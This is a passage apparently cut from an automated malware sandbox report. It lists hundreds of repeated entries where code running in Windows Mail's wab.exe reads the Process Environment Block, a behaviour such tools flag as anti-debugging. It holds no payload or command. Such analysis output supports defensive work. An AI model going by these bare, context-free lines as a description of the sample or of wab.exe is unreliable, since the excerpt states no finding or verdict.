        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FC310 mov ecx, dword ptr fs:[00000030h]8_2_226FC310
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D53FC mov eax, dword ptr fs:[00000030h]8_2_227D53FC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271E3F0 mov eax, dword ptr fs:[00000030h]8_2_2271E3F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271E3F0 mov eax, dword ptr fs:[00000030h]8_2_2271E3F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271E3F0 mov eax, dword ptr fs:[00000030h]8_2_2271E3F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227363FF mov eax, dword ptr fs:[00000030h]8_2_227363FF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227103E9 mov eax, dword ptr fs:[00000030h]8_2_227103E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227103E9 mov eax, dword ptr fs:[00000030h]8_2_227103E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227103E9 mov eax, dword ptr fs:[00000030h]8_2_227103E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227103E9 mov eax, dword ptr fs:[00000030h]8_2_227103E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227103E9 mov eax, dword ptr fs:[00000030h]8_2_227103E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227103E9 mov eax, dword ptr fs:[00000030h]8_2_227103E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227103E9 mov eax, dword ptr fs:[00000030h]8_2_227103E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227103E9 mov eax, dword ptr fs:[00000030h]8_2_227103E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BF3E6 mov eax, dword ptr fs:[00000030h]8_2_227BF3E6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BB3D0 mov ecx, dword ptr fs:[00000030h]8_2_227BB3D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270A3C0 mov eax, dword ptr fs:[00000030h]8_2_2270A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270A3C0 mov eax, dword ptr fs:[00000030h]8_2_2270A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270A3C0 mov eax, dword ptr fs:[00000030h]8_2_2270A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270A3C0 mov eax, dword ptr fs:[00000030h]8_2_2270A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270A3C0 mov eax, dword ptr fs:[00000030h]8_2_2270A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270A3C0 mov eax, dword ptr fs:[00000030h]8_2_2270A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227083C0 mov eax, dword ptr fs:[00000030h]8_2_227083C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227083C0 mov eax, dword ptr fs:[00000030h]8_2_227083C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227083C0 mov eax, dword ptr fs:[00000030h]8_2_227083C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227083C0 mov eax, dword ptr fs:[00000030h]8_2_227083C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BC3CD mov eax, dword ptr fs:[00000030h]8_2_227BC3CD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227863C0 mov eax, dword ptr fs:[00000030h]8_2_227863C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227333A0 mov eax, dword ptr fs:[00000030h]8_2_227333A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227333A0 mov eax, dword ptr fs:[00000030h]8_2_227333A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227233A5 mov eax, dword ptr fs:[00000030h]8_2_227233A5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D539D mov eax, dword ptr fs:[00000030h]8_2_227D539D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FE388 mov eax, dword ptr fs:[00000030h]8_2_226FE388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FE388 mov eax, dword ptr fs:[00000030h]8_2_226FE388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FE388 mov eax, dword ptr fs:[00000030h]8_2_226FE388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2275739A mov eax, dword ptr fs:[00000030h]8_2_2275739A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2275739A mov eax, dword ptr fs:[00000030h]8_2_2275739A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F8397 mov eax, dword ptr fs:[00000030h]8_2_226F8397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F8397 mov eax, dword ptr fs:[00000030h]8_2_226F8397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F8397 mov eax, dword ptr fs:[00000030h]8_2_226F8397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272438F mov eax, dword ptr fs:[00000030h]8_2_2272438F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272438F mov eax, dword ptr fs:[00000030h]8_2_2272438F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22711070 mov eax, dword ptr fs:[00000030h]8_2_22711070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22711070 mov ecx, dword ptr fs:[00000030h]8_2_22711070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22711070 mov eax, dword ptr fs:[00000030h]8_2_22711070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22711070 mov eax, dword ptr fs:[00000030h]8_2_22711070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22711070 mov eax, dword ptr fs:[00000030h]8_2_22711070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22711070 mov eax, dword ptr fs:[00000030h]8_2_22711070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22711070 mov eax, dword ptr fs:[00000030h]8_2_22711070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22711070 mov eax, dword ptr fs:[00000030h]8_2_22711070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22711070 mov eax, dword ptr fs:[00000030h]8_2_22711070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22711070 mov eax, dword ptr fs:[00000030h]8_2_22711070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22711070 mov eax, dword ptr fs:[00000030h]8_2_22711070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22711070 mov eax, dword ptr fs:[00000030h]8_2_22711070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22711070 mov eax, dword ptr fs:[00000030h]8_2_22711070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272C073 mov eax, dword ptr fs:[00000030h]8_2_2272C073
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277D070 mov ecx, dword ptr fs:[00000030h]8_2_2277D070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278106E mov eax, dword ptr fs:[00000030h]8_2_2278106E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D5060 mov eax, dword ptr fs:[00000030h]8_2_227D5060
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22702050 mov eax, dword ptr fs:[00000030h]8_2_22702050
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272B052 mov eax, dword ptr fs:[00000030h]8_2_2272B052
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227A705E mov ebx, dword ptr fs:[00000030h]8_2_227A705E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227A705E mov eax, dword ptr fs:[00000030h]8_2_227A705E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22786050 mov eax, dword ptr fs:[00000030h]8_2_22786050
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C903E mov eax, dword ptr fs:[00000030h]8_2_227C903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C903E mov eax, dword ptr fs:[00000030h]8_2_227C903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C903E mov eax, dword ptr fs:[00000030h]8_2_227C903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C903E mov eax, dword ptr fs:[00000030h]8_2_227C903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FA020 mov eax, dword ptr fs:[00000030h]8_2_226FA020
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FC020 mov eax, dword ptr fs:[00000030h]8_2_226FC020
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271E016 mov eax, dword ptr fs:[00000030h]8_2_2271E016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271E016 mov eax, dword ptr fs:[00000030h]8_2_2271E016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271E016 mov eax, dword ptr fs:[00000030h]8_2_2271E016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271E016 mov eax, dword ptr fs:[00000030h]8_2_2271E016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22784000 mov ecx, dword ptr fs:[00000030h]8_2_22784000
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227420F0 mov ecx, dword ptr fs:[00000030h]8_2_227420F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FA0E3 mov ecx, dword ptr fs:[00000030h]8_2_226FA0E3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227250E4 mov eax, dword ptr fs:[00000030h]8_2_227250E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227250E4 mov ecx, dword ptr fs:[00000030h]8_2_227250E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227860E0 mov eax, dword ptr fs:[00000030h]8_2_227860E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227080E9 mov eax, dword ptr fs:[00000030h]8_2_227080E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FC0F0 mov eax, dword ptr fs:[00000030h]8_2_226FC0F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D50D9 mov eax, dword ptr fs:[00000030h]8_2_227D50D9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227820DE mov eax, dword ptr fs:[00000030h]8_2_227820DE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227290DB mov eax, dword ptr fs:[00000030h]8_2_227290DB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov eax, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov ecx, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov ecx, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov eax, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov ecx, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov ecx, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov eax, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov eax, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov eax, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov eax, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov eax, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov eax, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov eax, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov eax, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov eax, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov eax, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov eax, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C0 mov eax, dword ptr fs:[00000030h]8_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277D0C0 mov eax, dword ptr fs:[00000030h]8_2_2277D0C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277D0C0 mov eax, dword ptr fs:[00000030h]8_2_2277D0C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C60B8 mov eax, dword ptr fs:[00000030h]8_2_227C60B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C60B8 mov ecx, dword ptr fs:[00000030h]8_2_227C60B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227980A8 mov eax, dword ptr fs:[00000030h]8_2_227980A8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FD08D mov eax, dword ptr fs:[00000030h]8_2_226FD08D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272D090 mov eax, dword ptr fs:[00000030h]8_2_2272D090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272D090 mov eax, dword ptr fs:[00000030h]8_2_2272D090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22705096 mov eax, dword ptr fs:[00000030h]8_2_22705096
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273909C mov eax, dword ptr fs:[00000030h]8_2_2273909C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278D080 mov eax, dword ptr fs:[00000030h]8_2_2278D080
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278D080 mov eax, dword ptr fs:[00000030h]8_2_2278D080
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270208A mov eax, dword ptr fs:[00000030h]8_2_2270208A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22799179 mov eax, dword ptr fs:[00000030h]8_2_22799179
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF172 mov eax, dword ptr fs:[00000030h]8_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22798158 mov eax, dword ptr fs:[00000030h]8_2_22798158
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22707152 mov eax, dword ptr fs:[00000030h]8_2_22707152
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22706154 mov eax, dword ptr fs:[00000030h]8_2_22706154
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22706154 mov eax, dword ptr fs:[00000030h]8_2_22706154
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F9148 mov eax, dword ptr fs:[00000030h]8_2_226F9148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F9148 mov eax, dword ptr fs:[00000030h]8_2_226F9148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F9148 mov eax, dword ptr fs:[00000030h]8_2_226F9148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F9148 mov eax, dword ptr fs:[00000030h]8_2_226F9148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D5152 mov eax, dword ptr fs:[00000030h]8_2_227D5152
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FC156 mov eax, dword ptr fs:[00000030h]8_2_226FC156
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22793140 mov eax, dword ptr fs:[00000030h]8_2_22793140
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22793140 mov eax, dword ptr fs:[00000030h]8_2_22793140
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22793140 mov eax, dword ptr fs:[00000030h]8_2_22793140
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22794144 mov eax, dword ptr fs:[00000030h]8_2_22794144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22794144 mov eax, dword ptr fs:[00000030h]8_2_22794144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22794144 mov ecx, dword ptr fs:[00000030h]8_2_22794144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22794144 mov eax, dword ptr fs:[00000030h]8_2_22794144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22794144 mov eax, dword ptr fs:[00000030h]8_2_22794144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22701131 mov eax, dword ptr fs:[00000030h]8_2_22701131
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22701131 mov eax, dword ptr fs:[00000030h]8_2_22701131
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22730124 mov eax, dword ptr fs:[00000030h]8_2_22730124
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FB136 mov eax, dword ptr fs:[00000030h]8_2_226FB136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FB136 mov eax, dword ptr fs:[00000030h]8_2_226FB136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FB136 mov eax, dword ptr fs:[00000030h]8_2_226FB136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FB136 mov eax, dword ptr fs:[00000030h]8_2_226FB136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227AA118 mov ecx, dword ptr fs:[00000030h]8_2_227AA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227AA118 mov eax, dword ptr fs:[00000030h]8_2_227AA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227AA118 mov eax, dword ptr fs:[00000030h]8_2_227AA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227AA118 mov eax, dword ptr fs:[00000030h]8_2_227AA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C0115 mov eax, dword ptr fs:[00000030h]8_2_227C0115
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227A71F9 mov esi, dword ptr fs:[00000030h]8_2_227A71F9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227301F8 mov eax, dword ptr fs:[00000030h]8_2_227301F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D61E5 mov eax, dword ptr fs:[00000030h]8_2_227D61E5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227251EF mov eax, dword ptr fs:[00000030h]8_2_227251EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227251EF mov eax, dword ptr fs:[00000030h]8_2_227251EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227251EF mov eax, dword ptr fs:[00000030h]8_2_227251EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227251EF mov eax, dword ptr fs:[00000030h]8_2_227251EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227251EF mov eax, dword ptr fs:[00000030h]8_2_227251EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227251EF mov eax, dword ptr fs:[00000030h]8_2_227251EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227251EF mov eax, dword ptr fs:[00000030h]8_2_227251EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227251EF mov eax, dword ptr fs:[00000030h]8_2_227251EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227251EF mov eax, dword ptr fs:[00000030h]8_2_227251EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227251EF mov eax, dword ptr fs:[00000030h]8_2_227251EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227251EF mov eax, dword ptr fs:[00000030h]8_2_227251EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227251EF mov eax, dword ptr fs:[00000030h]8_2_227251EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227251EF mov eax, dword ptr fs:[00000030h]8_2_227251EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227051ED mov eax, dword ptr fs:[00000030h]8_2_227051ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273D1D0 mov eax, dword ptr fs:[00000030h]8_2_2273D1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273D1D0 mov ecx, dword ptr fs:[00000030h]8_2_2273D1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277E1D0 mov eax, dword ptr fs:[00000030h]8_2_2277E1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277E1D0 mov eax, dword ptr fs:[00000030h]8_2_2277E1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277E1D0 mov ecx, dword ptr fs:[00000030h]8_2_2277E1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277E1D0 mov eax, dword ptr fs:[00000030h]8_2_2277E1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277E1D0 mov eax, dword ptr fs:[00000030h]8_2_2277E1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D51CB mov eax, dword ptr fs:[00000030h]8_2_227D51CB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C61C3 mov eax, dword ptr fs:[00000030h]8_2_227C61C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C61C3 mov eax, dword ptr fs:[00000030h]8_2_227C61C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271B1B0 mov eax, dword ptr fs:[00000030h]8_2_2271B1B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B11A4 mov eax, dword ptr fs:[00000030h]8_2_227B11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B11A4 mov eax, dword ptr fs:[00000030h]8_2_227B11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B11A4 mov eax, dword ptr fs:[00000030h]8_2_227B11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B11A4 mov eax, dword ptr fs:[00000030h]8_2_227B11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22757190 mov eax, dword ptr fs:[00000030h]8_2_22757190
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278019F mov eax, dword ptr fs:[00000030h]8_2_2278019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278019F mov eax, dword ptr fs:[00000030h]8_2_2278019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278019F mov eax, dword ptr fs:[00000030h]8_2_2278019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278019F mov eax, dword ptr fs:[00000030h]8_2_2278019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22740185 mov eax, dword ptr fs:[00000030h]8_2_22740185
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BC188 mov eax, dword ptr fs:[00000030h]8_2_227BC188
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BC188 mov eax, dword ptr fs:[00000030h]8_2_227BC188
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FA197 mov eax, dword ptr fs:[00000030h]8_2_226FA197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FA197 mov eax, dword ptr fs:[00000030h]8_2_226FA197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FA197 mov eax, dword ptr fs:[00000030h]8_2_226FA197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22732674 mov eax, dword ptr fs:[00000030h]8_2_22732674
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C866E mov eax, dword ptr fs:[00000030h]8_2_227C866E
